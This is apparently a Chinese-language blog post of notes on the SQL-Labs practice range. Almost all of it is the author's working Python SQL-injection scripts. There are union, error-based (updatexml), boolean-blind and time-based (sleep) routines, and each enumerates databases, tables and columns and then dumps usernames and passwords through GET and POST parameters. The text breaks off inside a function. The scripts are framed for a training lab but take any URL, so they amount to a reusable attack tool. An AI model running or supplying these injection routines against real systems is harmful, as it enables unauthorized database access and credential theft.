SQL-Labs 通关笔记 - LightFeather's Blog

Exp#

因为不想一直反复地去改脚本，因此直接写了一个对于这个靶场来说比较健全的脚本。不算好用，但是自己用用也还行（毕竟只花了两天不到就写完了……）

1
from lxml import etree # type: ignore
2
import requests
3
import logging
4

5
def parse(text, rule):
6
    try:
7
        html = etree.HTML(text)
8
        result = html.xpath(rule)
9
        if result:
10
            return result
11
        logging.warning("解析后内容为空...")
12
    except Exception as e:
13
        logging.exception("在解析时发生错误...")
14

15
def scrape_get(url, param):
16
    try:
17
        response = requests.get(url, params=param)
18
        if response.status_code == 200:
19
            return response.text
20
        logging.error(f"访问 {url} 时发生错误，返回的状态码为 {response.status_code} ...")
21
    except requests.RequestException:
22
        logging.error(f"无法访问 {url} ...")
23
    except Exception as e:
24
        logging.exception(f"发生未知错误...")
25

26
def scrape_post(url, data):
27
    try:
28
        response = requests.post(url, data=data)
29
        if response.status_code == 200:
30
            return response.text
31
        logging.error(f"访问 {url} 时发生错误，返回的状态码为 {response.status_code} ...")
32
    except requests.RequestException:
33
        logging.error(f"无法访问 {url} ...")
34
    except Exception as e:
35
        logging.exception(f"发生未知错误...")
36

37

38
def get(url, rule, param=None):
39
    response = scrape_get(url, param)
40
    if response:
41
        result = parse(response, rule)
42
        return result
43

44
def post(url, rule, data=None):
45
    response = scrape_post(url, data)
46
    if response:
47
        result = parse(response, rule)
48
        return result

1
import requests
2
import logging
3
import time
4

5
def get(url, param):
6
    start = time.time()
7
    try:
8
        response = requests.get(url, params=param)
9
        if response.status_code == 200:
10
            end = time.time()
11
            return end - start
12
        logging.error(f"访问 {url} 时发生错误，返回的状态码为 {response.status_code} ...")
13
    except requests.RequestException:
14
        logging.error(f"无法访问 {url} ...")
15
    except Exception as e:
16
        logging.exception(f"发生未知错误...")
17

18
def post(url, data):
19
    start = time.time()
20
    try:
21
        response = requests.post(url, data=data)
22
        if response.status_code == 200:
23
            end = time.time()
24
            return end - start
25
        logging.error(f"访问 {url} 时发生错误，返回的状态码为 {response.status_code} ...")
26
    except requests.RequestException:
27
        logging.error(f"无法访问 {url} ...")
28
    except Exception as e:
29
        logging.exception(f"发生未知错误...")

1
import logging
2

3
import request
4

5

6
def get(url, symbol, rule):
7
    logging.info(f"开始对 {url} 进行注入...")
8
    param = {
9
        "id": f"""-1{symbol} UNION SELECT 1,database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- """
10
    }
11
    logging.info(f"第一次注入内容为 {param['id']}...")
12
    response = request.get(url, rule, param)
13
    if response == None:
14
        logging.error(f"出现错误...")
15
        return None
16
    try:
17
        db_name = response[0].split(':')[1]
18
        tb_list = response[1].split(':')[1].split(',')
19
    except Exception as e:
20
        logging.exception("第一次注入语句出现错误...")
21
        return response
22
    print("[+] 发现数据表：", tb_list)
23
    while True:
24
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
25
        try:
26
            tb_name = tb_list[int(tb_index)]
27
            print(f"[+] 已选择数据表: {tb_name}")
28
            break
29
        except ValueError:
30
            print("[-] 输入无效！请输入数字格式的索引...")
31
        except IndexError:
32
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
33
        except Exception:
34
            print("[-] 发生未知错误，请重试...")
35
            return None
36
    param = {
37
        "id": f"""-1{symbol} UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}'-- """
38
    }
39
    logging.info(f"第二次注入内容为 {param['id']}...")
40
    response = request.get(url, rule, param)
41
    if response == None:
42
        logging.error(f"出现错误...")
43
        return None
44
    try:
45
        col_list = response[0].split(':')[1].split(',')
46
    except Exception as e:
47
        logging.exception("第二次注入语句出现错误...")
48
        return response
49
    print("[+] 发现数据列：", col_list)
50
    col_name_1 = col_list[1]
51
    col_name_2 = col_list[2]
52
    param = {
53
        "id": f"""-1{symbol} UNION SELECT 1,group_concat({col_name_1}),group_concat({col_name_2}) FROM {db_name}.{tb_name}-- """
54
    }
55
    logging.info(f"第三次注入内容为 {param['id']}...")
56
    response = request.get(url, rule, param)
57
    if response == None:
58
        logging.error(f"出现错误...")
59
        return None
60
    try:
61
        username = response[0].split(':')[1].split(',')
62
        password = response[1].split(':')[1].split(',')
63
    except Exception as e:
64
        logging.exception("第三次注入语句出现错误...")
65
        return response
66
    return username, password
67

68

69
def post(url, symbol, rule):
70
    logging.info(f"开始对 {url} 进行注入...")
71
    data = {
72
        "uname": f"""-1{symbol} UNION SELECT database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()#""",
73
        "passwd": ""
74
    }
75
    logging.info(f"第一次注入内容为 {data['uname']}...")
76
    response = request.post(url, rule, data)
77
    if response == None:
78
        logging.error(f"出现错误...")
79
        return None
80
    try:
81
        db_name = response[0].split(':')[1]
82
        tb_list = response[1].split(':')[1].split(',')
83
    except Exception as e:
84
        logging.exception("第一次注入语句出现错误...")
85
        return response
86
    print("[+] 发现数据表：", tb_list)
87
    while True:
88
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
89
        try:
90
            tb_name = tb_list[int(tb_index)]
91
            print(f"[+] 已选择数据表: {tb_name}")
92
            break
93
        except ValueError:
94
            print("[-] 输入无效！请输入数字格式的索引...")
95
        except IndexError:
96
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
97
        except Exception:
98
            print("[-] 发生未知错误，请重试...")
99
            return None
100
    data = {
101
        "uname": f"""-1{symbol} UNION SELECT group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}'#""",
102
        "passwd": ""
103
    }
104
    logging.info(f"第二次注入内容为 {data['uname']}...")
105
    response = request.post(url, rule, data)
106
    if response == None:
107
        logging.error(f"出现错误...")
108
        return None
109
    try:
110
        col_list = response[0].split(':')[1].split(',')
111
    except Exception as e:
112
        logging.exception("第二次注入语句出现错误...")
113
        return response
114
    print("[+] 发现数据列：", col_list)
115
    col_name_1 = col_list[1]
116
    col_name_2 = col_list[2]
117
    data = {
118
        "uname": f"""-1{symbol} UNION SELECT group_concat({col_name_1}),group_concat({col_name_2}) FROM {db_name}.{tb_name}#""",
119
        "passwd": ""
120
    }
121
    logging.info(f"第三次注入内容为 {data['uname']}...")
122
    response = request.post(url, rule, data)
123
    if response == None:
124
        logging.error(f"出现错误...")
125
        return None
126
    try:
127
        username = response[0].split(':')[1].split(',')
128
        password = response[1].split(':')[1].split(',')
129
    except Exception as e:
130
        logging.exception("第三次注入语句出现错误...")
131
        return response
132
    return username, password

1
import logging
2

3
import request
4

5

6
def get(url, symbol, rule):
7
    logging.info(f"开始对 {url} 进行注入...")
8
    param = {
9
        "id": f"""-1{symbol} or updatexml(1,concat(0x7e,database(),0x7e),1)-- """
10
    }
11
    logging.info(f"第一次注入内容为 {param['id']}...")
12
    response = request.get(url, rule, param)
13
    if response == None:
14
        logging.error(f"出现错误...")
15
        return None
16
    try:
17
        db_name = response[0].split(':')[1][3:-2]
18
    except Exception as e:
19
        logging.exception("第一次注入语句出现错误...")
20
        return response
21
    param = {
22
        "id": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='{db_name}'),0x7e),1)-- """
23
    }
24
    logging.info(f"第二次注入内容为 {param['id']} ...")
25
    response = request.get(url, rule, param)
26
    if response == None:
27
        logging.error(f"出现错误...")
28
        return None
29
    try:
30
        tb_list = response[0].split(':')[1][3:-2].split(',')
31
    except Exception as e:
32
        logging.exception("第二次注入语句出现错误...")
33
        return response
34
    print("[+] 发现数据表：", tb_list)
35
    while True:
36
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
37
        try:
38
            tb_name = tb_list[int(tb_index)]
39
            print(f"[+] 已选择数据表: {tb_name}")
40
            break
41
        except ValueError:
42
            print("[-] 输入无效！请输入数字格式的索引...")
43
        except IndexError:
44
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
45
        except Exception:
46
            print("[-] 发生未知错误，请重试...")
47
            return None
48
    param = {
49
        "id": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}'),0x7e),1)-- """
50
    }
51
    logging.info(f"第三次注入内容为 {param['id']}...")
52
    response = request.get(url, rule, param)
53
    if response == None:
54
        logging.error(f"出现错误...")
55
        return None
56
    try:
57
        col_list = response[0].split(':')[1][3:-2].split(',')
58
    except Exception as e:
59
        logging.exception("第三次注入语句出现错误...")
60
        return response
61
    print("[+] 发现数据列：", col_list)
62
    col_name_1 = col_list[1]
63
    logging.info(f"开始第四次注入...")
64
    p = 1
65
    tmp = "1"
66
    username = ""
67
    while tmp:
68
        param = {
69
            "id": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_1}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1)-- """
70
        }
71
        response = request.get(url, rule, param)
72
        if response == None:
73
            logging.error(f"出现错误...")
74
            return None
75
        try:
76
            tmp = response[0].split(':')[1][3:-2]
77
        except Exception as e:
78
            logging.exception("第四次注入语句出现错误...")
79
            return response
80
        username += tmp
81
        p += 30
82
    username = username.split(',')
83
    col_name_2 = col_list[2]
84
    logging.info("开始第五次注入...")
85
    p = 1
86
    tmp = "1"
87
    password = ""
88
    while tmp:
89
        param = {
90
            "id": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_2}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1)-- """
91
        }
92
        response = request.get(url, rule, param)
93
        if response == None:
94
            logging.error(f"出现错误...")
95
            return None
96
        try:
97
            tmp = response[0].split(':')[1][3:-2]
98
        except Exception as e:
99
            logging.exception("第五次注入语句出现错误...")
100
            return response
101
        password += tmp
102
        p += 30
103
    password = password.split(',')
104
    return username, password
105

106

107
def post(url, symbol, rule):
108
    logging.info(f"开始对 {url} 进行注入...")
109
    data = {
110
        "uname": f"""-1{symbol} or updatexml(1,concat(0x7e,database(),0x7e),1)#""",
111
        "passwd": ""
112
    }
113
    logging.info(f"第一次注入内容为 {data['uname']}...")
114
    response = request.post(url, rule, data)
115
    if response == None:
116
        logging.error(f"出现错误...")
117
        return None
118
    try:
119
        db_name = response[0].split(':')[1][3:-2]
120
    except Exception as e:
121
        logging.exception("第一次注入语句出现错误...")
122
        return response
123
    data = {
124
        "uname": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='{db_name}'),0x7e),1)#""",
125
        "passwd": ""
126
    }
127
    logging.info(f"第二次注入内容为 {data['uname']} ...")
128
    response = request.post(url, rule, data)
129
    if response == None:
130
        logging.error(f"出现错误...")
131
        return None
132
    try:
133
        tb_list = response[0].split(':')[1][3:-2].split(',')
134
    except Exception as e:
135
        logging.exception("第二次注入语句出现错误...")
136
        return response
137
    print("[+] 发现数据表：", tb_list)
138
    while True:
139
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
140
        try:
141
            tb_name = tb_list[int(tb_index)]
142
            print(f"[+] 已选择数据表: {tb_name}")
143
            break
144
        except ValueError:
145
            print("[-] 输入无效！请输入数字格式的索引...")
146
        except IndexError:
147
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
148
        except Exception:
149
            print("[-] 发生未知错误，请重试...")
150
            return None
151
    data = {
152
        "uname": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}'),0x7e),1)#""",
153
        "passwd": ""
154
    }
155
    logging.info(f"第三次注入内容为 {data['uname']}...")
156
    response = request.post(url, rule, data)
157
    if response == None:
158
        logging.error(f"出现错误...")
159
        return None
160
    try:
161
        col_list = response[0].split(':')[1][3:-2].split(',')
162
    except Exception as e:
163
        logging.exception("第三次注入语句出现错误...")
164
        return response
165
    print("[+] 发现数据列：", col_list)
166
    col_name_1 = col_list[1]
167
    logging.info("开始第四次注入...")
168
    p = 1
169
    tmp = "1"
170
    username = ""
171
    while tmp:
172
        data = {
173
            "uname": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_1}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1)#""",
174
            "passwd": ""
175
        }
176
        response = request.post(url, rule, data)
177
        if response == None:
178
            logging.error(f"出现错误...")
179
            return None
180
        try:
181
            tmp = response[0].split(':')[1][3:-2]
182
        except Exception as e:
183
            logging.exception("第四次注入语句出现错误...")
184
            return response
185
        username += tmp
186
        p += 30
187
    username = username.split(',')
188
    col_name_2 = col_list[2]
189
    logging.info("开始第五次注入...")
190
    p = 1
191
    tmp = "1"
192
    password = ""
193
    while tmp:
194
        data = {
195
            "uname": f"""-1{symbol} or updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_2}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1)#""",
196
            "passwd": ""
197
        }
198
        response = request.post(url, rule, data)
199
        if response == None:
200
            logging.error(f"出现错误...")
201
            return None
202
        try:
203
            tmp = response[0].split(':')[1][3:-2]
204
        except Exception as e:
205
            logging.exception("第五次注入语句出现错误...")
206
            return response
207
        password += tmp
208
        p += 30
209
    password = password.split(',')
210
    return username, password

1
import logging
2

3
import request
4

5

6
def get_length(type):
7
    # 爆破长度
8
    length = 1
9
    param = {
10
        "id": f"""-1{SYMBOL} or length({type})={length}-- """
11
    }
12
    response = request.get(URL, RULE, param)
13
    while response != result:
14
        length += 1
15
        param = {
16
            "id": f"""-1{SYMBOL} or length({type})={length}-- """
17
        }
18
        response = request.get(URL, RULE, param)
19
    return length
20

21
def get_num(type):
22
    # 爆破数量
23
    num = 1
24
    param = {
25
        "id": f"""-1{SYMBOL} or {type}={num}-- """
26
    }
27
    response = request.get(URL, RULE, param)
28
    while response != result:
29
        num += 1
30
        param = {
31
            "id": f"""-1{SYMBOL} or {type}={num}-- """
32
        }
33
        response = request.get(URL, RULE, param)
34
    return num
35

36
def get_name(length, type):
37
    # 爆破名称
38
    a = {
39
        "digit": (48, 57),
40
        "upper": (65, 90),
41
        "lower": (97, 122)
42
    }
43
    name = ""
44
    for pos in range(1, length + 1):
45
        char_type = None
46
        param = {
47
            "id": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<=57-- """
48
        }
49
        response = request.get(URL, RULE, param=param)
50
        if response == result:
51
            char_type = "digit"
52
        else:
53
            param = {
54
                "id": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<=90-- """
55
            }
56
            response = request.get(URL, RULE, param)
57
            if response == result:
58
                char_type = "upper"
59
            else:
60
                char_type = "lower"
61

62
        low, high = a[char_type]
63
        while low <= high:
64
            mid = (low + high) // 2
65
            param = {
66
                "id": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))={mid}-- """
67
            }
68
            response = request.get(URL, RULE, param)
69
            if response == result:
70
                name += chr(mid)
71
                break
72
            param = {
73
                "id": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<{mid}-- """
74
            }
75
            response = request.get(URL, RULE, param)
76
            if response == result:
77
                high = mid - 1
78
            else:
79
                low = mid + 1
80
    return name
81

82

83
def get(url, symbol, rule):
84
    global URL, SYMBOL, RULE
85
    URL = url
86
    SYMBOL = symbol
87
    RULE = rule
88

89
    logging.info(f"开始对 {url} 进行注入...")
90

91
    global result
92
    param = {
93
        "id": f"-1{SYMBOL} or 1=1-- "
94
    }
95
    result = request.get(URL, RULE, param)
96

97
    logging.info("爆破数据库名...")
98
    type = """database()"""
99
    db_length = get_length(type)
100
    db_name = get_name(db_length, type)
101
    logging.info("成功获取数据库名...")
102
    print("[+] 成功获取数据库名：", db_name)
103
    logging.info(f"开始爆破 {db_name} 库的数据表...")
104
    type = f"""(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db_name}')"""
105
    tb_num = get_num(type)
106
    tb_list = []
107
    for i in range(tb_num):
108
        type = f"""(SELECT table_name FROM information_schema.tables WHERE table_schema='{db_name}' LIMIT {i},1)"""
109
        length = get_length(type)
110
        tb_name = get_name(length, type)
111
        tb_list.append(tb_name)
112
    logging.info("成功获取所有数据表名...")
113
    print("[+] 发现数据表：", tb_list)
114
    while True:
115
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
116
        try:
117
            tb_name = tb_list[int(tb_index)]
118
            print(f"[+] 已选择数据表: {tb_name}")
119
            break
120
        except ValueError:
121
            print("[-] 输入无效！请输入数字格式的索引...")
122
        except IndexError:
123
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
124
        except Exception:
125
            print("[-] 发生未知错误，请重试...")
126
            return None
127
    logging.info(f"开始爆破 {tb_name} 的数据列...")
128
    type = f"""(SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}')"""
129
    col_num = get_num(type)
130
    col_list = []
131
    for i in range(col_num):
132
        type = f"""(SELECT column_name FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}' LIMIT {i},1)"""
133
        length = get_length(type)
134
        col_name = get_name(length, type)
135
        col_list.append(col_name)
136
    logging.info("成功获取所有数据列名...")
137
    print("[+] 发现数据列：", col_list)
138
    while True:
139
        col_index = input("[*] 请输入想要获取详细信息的数据列的索引：")
140
        try:
141
            col_name = col_list[int(col_index)]
142
            print(f"[+] 已选择数据列: {col_name}")
143
            break
144
        except ValueError:
145
            print("[-] 输入无效！请输入数字格式的索引...")
146
        except IndexError:
147
            print(f"[-] 索引越界！请输入 0 到 {len(col_list) - 1} 之间的数字...")
148
        except Exception:
149
            print("[-] 发生未知错误，请重试...")
150
            return None
151
    logging.info(f"开始爆破 {col_name} 列的值...")
152
    type = f"""(SELECT COUNT(*) FROM {db_name}.{tb_name})"""
153
    value_num = get_num(type)
154
    value_list = []
155
    for i in range(value_num):
156
        type = f"""(SELECT {col_name} FROM {db_name}.{tb_name} LIMIT {i},1)"""
157
        length = get_length(type)
158
        value = get_name(length, type)
159
        value_list.append(value)
160
    return value_list
161

162

163

164
def post_length(type):
165
    # 爆破长度
166
    length = 1
167
    data = {
168
        "uname": f"""-1{SYMBOL} or length({type})={length}#""",
169
        "passwd": ""
170
    }
171
    response = request.post(URL, RULE, data)
172
    while response != result:
173
        length += 1
174
        data = {
175
            "uname": f"""-1{SYMBOL} or length({type})={length}#""",
176
            "passwd": ""
177
        }
178
        response = request.post(URL, RULE, data)
179
    return length
180

181
def post_num(type):
182
    # 爆破数量
183
    num = 1
184
    data = {
185
        "uname": f"""-1{SYMBOL} or {type}={num}#""",
186
        "passwd": ""
187
    }
188
    response = request.post(URL, RULE, data)
189
    while response != result:
190
        num += 1
191
        data = {
192
            "uname": f"""-1{SYMBOL} or {type}={num}#""",
193
            "passwd": ""
194
        }
195
        response = request.post(URL, RULE, data)
196
    return num
197

198
def post_name(length, type):
199
    # 爆破名称
200
    a = {
201
        "digit": (48, 57),
202
        "upper": (65, 90),
203
        "lower": (97, 122)
204
    }
205
    name = ""
206
    for pos in range(1, length + 1):
207
        char_type = None
208
        data = {
209
            "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<=57#""",
210
            "passwd": ""
211
        }
212
        response = request.post(URL, RULE, data=data)
213
        if response == result:
214
            char_type = "digit"
215
        else:
216
            data = {
217
                "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<=90#""",
218
                "passwd": ""
219
            }
220
            response = request.post(URL, RULE, data)
221
            if response == result:
222
                char_type = "upper"
223
            else:
224
                char_type = "lower"
225

226
        low, high = a[char_type]
227
        while low <= high:
228
            mid = (low + high) // 2
229
            data = {
230
                "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))={mid}#""",
231
                "passwd": ""
232
            }
233
            response = request.post(URL, RULE, data)
234
            if response == result:
235
                name += chr(mid)
236
                break
237
            data = {
238
                "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<{mid}#""",
239
                "passwd": ""
240
            }
241
            response = request.post(URL, RULE, data)
242
            if response == result:
243
                high = mid - 1
244
            else:
245
                low = mid + 1
246
    return name
247

248

249
def post(url, symbol, rule):
250
    global URL, SYMBOL, RULE
251
    URL = url
252
    SYMBOL = symbol
253
    RULE = rule
254

255
    logging.info(f"开始对 {url} 进行注入...")
256

257
    global result
258
    data = {
259
        "uname": f"1{SYMBOL} or 1=1#",
260
        "passwd": ""
261
    }
262
    result = request.post(URL, RULE, data)
263

264
    logging.info("爆破数据库名...")
265
    type = """database()"""
266
    db_length = post_length(type)
267
    db_name = post_name(db_length, type)
268
    logging.info("成功获取数据库名...")
269
    print("[+] 成功获取数据库名：", db_name)
270
    logging.info(f"开始爆破 {db_name} 库的数据表...")
271
    type = f"""(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db_name}')"""
272
    tb_num = post_num(type)
273
    tb_list = []
274
    for i in range(tb_num):
275
        type = f"""(SELECT table_name FROM information_schema.tables WHERE table_schema='{db_name}' LIMIT {i},1)"""
276
        length = post_length(type)
277
        tb_name = post_name(length, type)
278
        tb_list.append(tb_name)
279
    logging.info("成功获取所有数据表名...")
280
    print("[+] 发现数据表：", tb_list)
281
    while True:
282
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
283
        try:
284
            tb_name = tb_list[int(tb_index)]
285
            print(f"[+] 已选择数据表: {tb_name}")
286
            break
287
        except ValueError:
288
            print("[-] 输入无效！请输入数字格式的索引...")
289
        except IndexError:
290
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
291
        except Exception:
292
            print("[-] 发生未知错误，请重试...")
293
            return None
294
    logging.info(f"开始爆破 {tb_name} 的数据列...")
295
    type = f"""(SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}')"""
296
    col_num = post_num(type)
297
    col_list = []
298
    for i in range(col_num):
299
        type = f"""(SELECT column_name FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}' LIMIT {i},1)"""
300
        length = post_length(type)
301
        col_name = post_name(length, type)
302
        col_list.append(col_name)
303
    logging.info("成功获取所有数据列名...")
304
    print("[+] 发现数据列：", col_list)
305
    while True:
306
        col_index = input("[*] 请输入想要获取详细信息的数据列的索引：")
307
        try:
308
            col_name = col_list[int(col_index)]
309
            print(f"[+] 已选择数据列: {col_name}")
310
            break
311
        except ValueError:
312
            print("[-] 输入无效！请输入数字格式的索引...")
313
        except IndexError:
314
            print(f"[-] 索引越界！请输入 0 到 {len(col_list) - 1} 之间的数字...")
315
        except Exception:
316
            print("[-] 发生未知错误，请重试...")
317
            return None
318
    logging.info(f"开始爆破 {col_name} 列的值...")
319
    type = f"""(SELECT COUNT(*) FROM {db_name}.{tb_name})"""
320
    value_num = post_num(type)
321
    value_list = []
322
    for i in range(value_num):
323
        type = f"""(SELECT {col_name} FROM {db_name}.{tb_name} LIMIT {i},1)"""
324
        length = post_length(type)
325
        value = post_name(length, type)
326
        value_list.append(value)
327
    return value_list

1
import logging
2

3
import RequestTime
4

5

6
def get_length(type):
7
    # 爆破长度
8
    length = 1
9
    param = {
10
        "id": f"""-1{SYMBOL} or if((length({type})={length}),sleep(2),1)-- """
11
    }
12
    response = RequestTime.get(URL, param) or 2
13
    while response < 2:
14
        length += 1
15
        param = {
16
            "id": f"""-1{SYMBOL} or if((length({type})={length}),sleep(2),1)-- """
17
        }
18
        response = RequestTime.get(URL, param) or 2
19
    return length
20

21
def get_num(type):
22
    # 爆破数量
23
    num = 1
24
    param = {
25
        "id": f"""-1{SYMBOL} or if(({type}={num}),sleep(2),1)-- """
26
    }
27
    response = RequestTime.get(URL, param) or 2
28
    while response < 2:
29
        num += 1
30
        param = {
31
            "id": f"""-1{SYMBOL} or if(({type}={num}),sleep(2),1)-- """
32
        }
33
        response = RequestTime.get(URL, param) or 2
34
    return num
35

36
def get_name(length, type):
37
    # 爆破名称
38
    a = {
39
        "digit": (48, 57),
40
        "upper": (65, 90),
41
        "lower": (97, 122)
42
    }
43
    name = ""
44
    for pos in range(1, length + 1):
45
        char_type = None
46
        param = {
47
            "id": f"""-1{SYMBOL} or if((ascii(substring({type},{pos},1))<=57),sleep(2),1)-- """
48
        }
49
        response = RequestTime.get(URL, param=param) or 2
50
        if response >= 2:
51
            char_type = "digit"
52
        else:
53
            param = {
54
                "id": f"""-1{SYMBOL} or if((ascii(substring({type},{pos},1))<=90),sleep(2),1)-- """
55
            }
56
            response = RequestTime.get(URL, param) or 2
57
            if response >= 2:
58
                char_type = "upper"
59
            else:
60
                char_type = "lower"
61

62
        low, high = a[char_type]
63
        while low <= high:
64
            mid = (low + high) // 2
65
            param = {
66
                "id": f"""-1{SYMBOL} or if((ascii(substring({type},{pos},1))={mid}),sleep(2),1)-- """
67
            }
68
            response = RequestTime.get(URL, param) or 2
69
            if response >= 2:
70
                name += chr(mid)
71
                break
72
            param = {
73
                "id": f"""-1{SYMBOL} or if((ascii(substring({type},{pos},1))<{mid}),sleep(2),1)-- """
74
            }
75
            response = RequestTime.get(URL, param) or 2
76
            if response >= 2:
77
                high = mid - 1
78
            else:
79
                low = mid + 1
80
    return name
81

82

83
def get(url, symbol):
84
    global URL, SYMBOL
85
    URL = url
86
    SYMBOL = symbol
87

88
    logging.info(f"开始对 {url} 进行注入...")
89
    logging.info("爆破数据库名...")
90
    type = """database()"""
91
    db_length = get_length(type)
92
    db_name = get_name(db_length, type)
93
    logging.info("成功获取数据库名...")
94
    print("[+] 成功获取数据库名：", db_name)
95
    logging.info(f"开始爆破 {db_name} 库的数据表...")
96
    type = f"""(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db_name}')"""
97
    tb_num = get_num(type)
98
    tb_list = []
99
    for i in range(tb_num):
100
        type = f"""(SELECT table_name FROM information_schema.tables WHERE table_schema='{db_name}' LIMIT {i},1)"""
101
        length = get_length(type)
102
        tb_name = get_name(length, type)
103
        tb_list.append(tb_name)
104
    logging.info("成功获取所有数据表名...")
105
    print("[+] 发现数据表：", tb_list)
106
    while True:
107
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
108
        try:
109
            tb_name = tb_list[int(tb_index)]
110
            print(f"[+] 已选择数据表: {tb_name}")
111
            break
112
        except ValueError:
113
            print("[-] 输入无效！请输入数字格式的索引...")
114
        except IndexError:
115
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
116
        except Exception:
117
            print("[-] 发生未知错误，请重试...")
118
            return None
119
    logging.info(f"开始爆破 {tb_name} 的数据列...")
120
    type = f"""(SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}')"""
121
    col_num = get_num(type)
122
    col_list = []
123
    for i in range(col_num):
124
        type = f"""(SELECT column_name FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}' LIMIT {i},1)"""
125
        length = get_length(type)
126
        col_name = get_name(length, type)
127
        col_list.append(col_name)
128
    logging.info("成功获取所有数据列名...")
129
    print("[+] 发现数据列：", col_list)
130
    while True:
131
        col_index = input("[*] 请输入想要获取详细信息的数据列的索引：")
132
        try:
133
            col_name = col_list[int(col_index)]
134
            print(f"[+] 已选择数据列: {col_name}")
135
            break
136
        except ValueError:
137
            print("[-] 输入无效！请输入数字格式的索引...")
138
        except IndexError:
139
            print(f"[-] 索引越界！请输入 0 到 {len(col_list) - 1} 之间的数字...")
140
        except Exception:
141
            print("[-] 发生未知错误，请重试...")
142
            return None
143
    logging.info(f"开始爆破 {col_name} 列的值...")
144
    type = f"""(SELECT COUNT(*) FROM {db_name}.{tb_name})"""
145
    value_num = get_num(type)
146
    value_list = []
147
    for i in range(value_num):
148
        type = f"""(SELECT {col_name} FROM {db_name}.{tb_name} LIMIT {i},1)"""
149
        length = get_length(type)
150
        value = get_name(length, type)
151
        value_list.append(value)
152
    return value_list
153

154

155

156
def post_length(type):
157
    # 爆破长度
158
    length = 1
159
    data = {
160
        "uname": f"""-1{SYMBOL} or length({type})={length}#""",
161
        "passwd": ""
162
    }
163
    response = RequestTime.post(URL, data) or 2
164
    while response < 2:
165
        length += 1
166
        data = {
167
            "uname": f"""-1{SYMBOL} or length({type})={length}#""",
168
            "passwd": ""
169
        }
170
        response = RequestTime.post(URL, data) or 2
171
    return length
172

173
def post_num(type):
174
    # 爆破数量
175
    num = 1
176
    data = {
177
        "uname": f"""-1{SYMBOL} or {type}={num}#""",
178
        "passwd": ""
179
    }
180
    response = RequestTime.post(URL, data) or 2
181
    while response < 2:
182
        num += 1
183
        data = {
184
            "uname": f"""-1{SYMBOL} or {type}={num}#""",
185
            "passwd": ""
186
        }
187
        response = RequestTime.post(URL, data) or 2
188
    return num
189

190
def post_name(length, type):
191
    # 爆破名称
192
    a = {
193
        "digit": (48, 57),
194
        "upper": (65, 90),
195
        "lower": (97, 122)
196
    }
197
    name = ""
198
    for pos in range(1, length + 1):
199
        char_type = None
200
        data = {
201
            "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<=57#""",
202
            "passwd": ""
203
        }
204
        response = RequestTime.post(URL, data=data) or 2
205
        if response >= 2:
206
            char_type = "digit"
207
        else:
208
            data = {
209
                "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<=90#""",
210
                "passwd": ""
211
            }
212
            response = RequestTime.post(URL, data) or 2
213
            if response >= 2:
214
                char_type = "upper"
215
            else:
216
                char_type = "lower"
217

218
        low, high = a[char_type]
219
        while low <= high:
220
            mid = (low + high) // 2
221
            data = {
222
                "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))={mid}#""",
223
                "passwd": ""
224
            }
225
            response = RequestTime.post(URL, data) or 2
